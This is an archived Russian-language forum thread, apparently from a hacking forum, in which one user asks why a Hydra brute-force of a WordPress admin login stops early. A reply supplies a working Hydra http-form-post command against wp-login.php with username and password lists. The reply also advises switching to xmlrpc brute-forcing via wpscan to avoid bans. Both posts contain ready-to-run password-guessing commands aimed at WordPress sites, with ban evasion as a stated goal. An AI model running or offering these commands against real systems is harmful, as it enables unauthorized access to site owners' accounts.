Просмотр полной версии : Hydra HTTP Base Auth Brutforce
QwertyLol
24.01.2020, 14:15
Привет всем , собственно стартуем с такой команды "hydra -l admin -x 4:8:0123456789 -s 443 -f ( domain host) https-get /wp-admin"и старт заканчивается на первых цифрах .говорит что пароль найден , но он не верен , по всей видимости он сам останавливается по каким-то причинам . Пробовал также ставить количество задач и тайм опциями -t -w но не помогало . подскажите как начать нормально брутить
Lestatkiy
24.01.2020, 16:26
В гугле полно ответов по поводу брута wp, вот один из примеров:
hydra -L lists/usrname.txt -P lists/pass.txt localhost -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Но гидра быстро получит бан, используй wp xmlrpc для брута, он есть в "wpscan" https://github.com/wpscanteam/wpscan
/threads/436408/ (https://antichat.live/threads/436408/)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot